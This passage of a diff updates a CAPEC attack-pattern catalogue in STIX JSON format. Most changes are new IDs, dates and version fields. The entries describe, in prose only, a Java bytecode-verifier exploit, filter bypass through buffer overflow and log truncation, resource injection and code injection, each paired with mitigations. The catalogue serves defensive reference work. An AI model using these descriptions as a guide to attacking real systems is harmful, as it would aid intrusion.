code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -13838,115 +13986,116 @@ "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--82c41549-f62c-486a-95e2-3decf2749d01" + "id": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-237-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.", "type": "course-of-action", - "id": "course-of-action--c44062de-e7fc-429f-b6ff-2d9ce1d57722" + "id": "course-of-action--dcd3ef50-9ba5-43c7-883f-9dd4c521fbb0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--895cba34-ac95-474a-928d-7a0672fbc17b", - "source_ref": "course-of-action--c44062de-e7fc-429f-b6ff-2d9ce1d57722", + "id": "relationship--da069bcf-e3fc-45a2-8488-8326ecf63287", + "source_ref": "course-of-action--dcd3ef50-9ba5-43c7-883f-9dd4c521fbb0", "relationship_type": "mitigates", - "target_ref": "attack-pattern--82c41549-f62c-486a-95e2-3decf2749d01" + "target_ref": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-237-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.", "type": "course-of-action", - "id": "course-of-action--b6d013e1-29fc-48cb-ba75-74be21bc31e3" + "id": "course-of-action--5f697f6c-8b52-40bb-8305-138fdf96c077" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--890e11de-56b4-4633-a451-c4d4226cefa2", - "source_ref": "course-of-action--b6d013e1-29fc-48cb-ba75-74be21bc31e3", + "id": "relationship--79faf469-f2d1-4818-ae18-9c928898c7da", + "source_ref": "course-of-action--5f697f6c-8b52-40bb-8305-138fdf96c077", "relationship_type": "mitigates", - "target_ref": "attack-pattern--82c41549-f62c-486a-95e2-3decf2749d01" + "target_ref": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-237-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.", "type": "course-of-action", - "id": "course-of-action--dd1a4c3d-6bde-42c2-bdd2-32c196c35525" + "id": "course-of-action--75cfbaa2-4ebd-4bd2-8bcd-1cc9bb5c18f6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c3cfe5fc-90b5-4576-abd2-066fc8e05e35", - "source_ref": "course-of-action--dd1a4c3d-6bde-42c2-bdd2-32c196c35525", + "id": "relationship--b94b8cfb-b5b8-4c4f-aaed-9a9e632ac4f7", + "source_ref": "course-of-action--75cfbaa2-4ebd-4bd2-8bcd-1cc9bb5c18f6", "relationship_type": "mitigates", - "target_ref": "attack-pattern--82c41549-f62c-486a-95e2-3decf2749d01" + "target_ref": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-237-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Configuration: Get latest updates for the computer.", "type": "course-of-action", - "id": "course-of-action--2ff56af6-5da3-4e9a-97c6-890c08dcd105" + "id": "course-of-action--c0eed457-44b1-4a33-8586-68018a3bbbcf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--69ed67be-82ce-47fc-a5d1-472b4a06ac17", - "source_ref": "course-of-action--2ff56af6-5da3-4e9a-97c6-890c08dcd105", + "id": "relationship--bff251e7-c45a-4a47-84f1-4dc948e663a8", + "source_ref": "course-of-action--c0eed457-44b1-4a33-8586-68018a3bbbcf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--82c41549-f62c-486a-95e2-3decf2749d01" + "target_ref": "attack-pattern--402bbd1b-6fee-44fd-8c59-e90acccd0be6" }, { "name": "DEPRECATED: Using URL/codebase / G.A.C. (code source) to convince sandbox of privilege", "description": "This attack pattern has been deprecated as it did not appear to be a valid attack pattern.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -13959,15 +14108,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--3b5a90a8-3515-4042-a35c-a68fbc9972d1" + "id": "attack-pattern--f39ee485-4296-473e-9c38-c1729322fbc3" }, { "name": "DEPRECATED: Subversion of Authorization Checks: Cache Filtering, Programmatic Security, etc.", "description": "This attack pattern has been deprecated as it did not contain any content and did not serve any useful purpose. Please refer to \"CAPEC-207: removing Important Client Functionality\" going forward.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -13980,15 +14130,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--f2ad26b6-a2dd-4d34-b0bd-204954a58c4d" + "id": "attack-pattern--953e5d44-3432-4d95-a2b3-7dd74ebc6006" }, { "name": "Filter Failure through Buffer Overflow", "description": "In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -14080,140 +14231,141 @@ "Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--8b4059c7-1164-43a9-b4a0-1d6100e06f67" + "id": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-24-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.", "type": "course-of-action", - "id": "course-of-action--9701d09e-9d90-4e76-bf48-79c3552a7a01" + "id": "course-of-action--a74c5c6a-568e-4159-aeb5-0c69bdad41ce" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dc617ca3-d770-4d3f-a078-80ff38cfd690", - "source_ref": "course-of-action--9701d09e-9d90-4e76-bf48-79c3552a7a01", + "id": "relationship--4dd07f35-9062-41e7-906b-fa082b33e7fe", + "source_ref": "course-of-action--a74c5c6a-568e-4159-aeb5-0c69bdad41ce", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8b4059c7-1164-43a9-b4a0-1d6100e06f67" + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-24-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Pre-design: Use a language or compiler that performs automatic bounds checking.", "type": "course-of-action", - "id": "course-of-action--8aae8edf-638b-4aec-9318-492f92fb1d26" + "id": "course-of-action--ae94d088-b630-4a15-b1f7-193cf9d7408e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f59836b4-c6eb-430c-8e42-91f252ad8305", - "source_ref": "course-of-action--8aae8edf-638b-4aec-9318-492f92fb1d26", + "id": "relationship--5e94abf8-fdbc-4b80-ae54-bd12dc2c72dc", + "source_ref": "course-of-action--ae94d088-b630-4a15-b1f7-193cf9d7408e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8b4059c7-1164-43a9-b4a0-1d6100e06f67" + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-24-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", "type": "course-of-action", - "id": "course-of-action--44e8d200-36fe-4fbf-9af2-eb0d31272764" + "id": "course-of-action--56ee7284-adfd-41b9-b592-5092da42b889" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--eac9043a-1989-4a1f-bdcb-544c07dc69a0", - "source_ref": "course-of-action--44e8d200-36fe-4fbf-9af2-eb0d31272764", + "id": "relationship--274e4808-9a33-4298-aa29-938291b48a4d", + "source_ref": "course-of-action--56ee7284-adfd-41b9-b592-5092da42b889", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8b4059c7-1164-43a9-b4a0-1d6100e06f67" + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-24-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Operational: Use OS-level preventative functionality. Not a complete solution.", "type": "course-of-action", - "id": "course-of-action--1543df5d-5c88-43ad-a8ef-67cfefcdb4ed" + "id": "course-of-action--d2e2f760-3e91-480d-a010-51c7214317af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--7a8d792e-5b23-47fa-800c-8c18bc672b98", - "source_ref": "course-of-action--1543df5d-5c88-43ad-a8ef-67cfefcdb4ed", + "id": "relationship--762c6f91-15c4-4702-9f8c-9f3c573029eb", + "source_ref": "course-of-action--d2e2f760-3e91-480d-a010-51c7214317af", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8b4059c7-1164-43a9-b4a0-1d6100e06f67" + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-24-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Use an abstraction library to abstract away risky APIs. Not a complete solution.", "type": "course-of-action", - "id": "course-of-action--1555f9ec-5b1f-4e81-8a4e-15a2a264eab5" + "id": "course-of-action--5630615d-5b7f-4130-a543-f6c837c62b7a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--3a2dcc11-fd1b-4cf0-b66e-b50d620b0840", - "source_ref": "course-of-action--1555f9ec-5b1f-4e81-8a4e-15a2a264eab5", + "id": "relationship--620c1f68-4871-421e-b086-fb7f087aec4b", + "source_ref": "course-of-action--5630615d-5b7f-4130-a543-f6c837c62b7a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--8b4059c7-1164-43a9-b4a0-1d6100e06f67" + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7" }, { "name": "Resource Injection", "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -14244,90 +14396,91 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--71405fa8-8a99-471a-ba7c-0573933ac402" + "id": "attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-240-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Ensure all input content that is delivered to client is sanitized against an acceptable content specification.", "type": "course-of-action", - "id": "course-of-action--3414ba6b-8ed2-49b7-934b-163702392526" + "id": "course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2924e69c-9b42-4951-82c2-aa6190aafa5f", - "source_ref": "course-of-action--3414ba6b-8ed2-49b7-934b-163702392526", + "id": "relationship--13a44cf6-6aaa-4ebd-955a-5d5a951e7c35", + "source_ref": "course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30", "relationship_type": "mitigates", - "target_ref": "attack-pattern--71405fa8-8a99-471a-ba7c-0573933ac402" + "target_ref": "attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-240-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Perform input validation for all content.", "type": "course-of-action", - "id": "course-of-action--5b79d919-12d5-443c-9381-126797de730a" + "id": "course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--606a71ad-e05f-4007-9a47-568f58322cdf", - "source_ref": "course-of-action--5b79d919-12d5-443c-9381-126797de730a", + "id": "relationship--f1b706da-f3ca-46f8-ba74-f37311cd7149", + "source_ref": "course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--71405fa8-8a99-471a-ba7c-0573933ac402" + "target_ref": "attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-240-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Enforce regular patching of software.", "type": "course-of-action", - "id": "course-of-action--01ea330a-1b85-4dde-843a-b0d4be2e4d28" + "id": "course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f293c4a9-0b24-4be8-a4b7-4f1f13f7d9ed", - "source_ref": "course-of-action--01ea330a-1b85-4dde-843a-b0d4be2e4d28", + "id": "relationship--1f14c3e6-c62b-4ac2-bfd7-7b004ea6fd38", + "source_ref": "course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--71405fa8-8a99-471a-ba7c-0573933ac402" + "target_ref": "attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf" }, { "name": "DEPRECATED: Code Injection", "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-242 : Code Injection\". Please refer to this other CAPEC going forward.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -14340,15 +14493,16 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ee19a024-299f-47bb-9efe-029d8a5d1e54" + "id": "attack-pattern--559dc460-3811-474c-89d7-7b0987d96cea" }, { "name": "Code Injection", "description": "An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -14382,79 +14536,80 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a151efbf-6c4c-405a-9aef-71bacdad8a87" + "id": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-242-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Utilize strict type, character, and encoding enforcement", "type": "course-of-action", - "id": "course-of-action--1500ff5b-d898-438c-9c86-dbf01d0ff48f" + "id": "course-of-action--280047d5-2fea-4418-8952-f13e43540cdf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--23bf3a5d-5726-4036-a32a-cedc5b213e15", - "source_ref": "course-of-action--1500ff5b-d898-438c-9c86-dbf01d0ff48f", + "id": "relationship--9b804090-8565-4f9a-b785-46ad01aab0b6", + "source_ref": "course-of-action--280047d5-2fea-4418-8952-f13e43540cdf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a151efbf-6c4c-405a-9aef-71bacdad8a87" + "target_ref": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8c8dcdb2-5793-4a70-9a08-26bff1798396", - "source_ref": "course-of-action--3414ba6b-8ed2-49b7-934b-163702392526", + "id": "relationship--34d3d53a-099c-40bd-9bea-48dc6cf18afe", + "source_ref": "course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a151efbf-6c4c-405a-9aef-71bacdad8a87" + "target_ref": "attack-pattern--be442a79-9548-4668-bb33-e24c51b63e55" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": 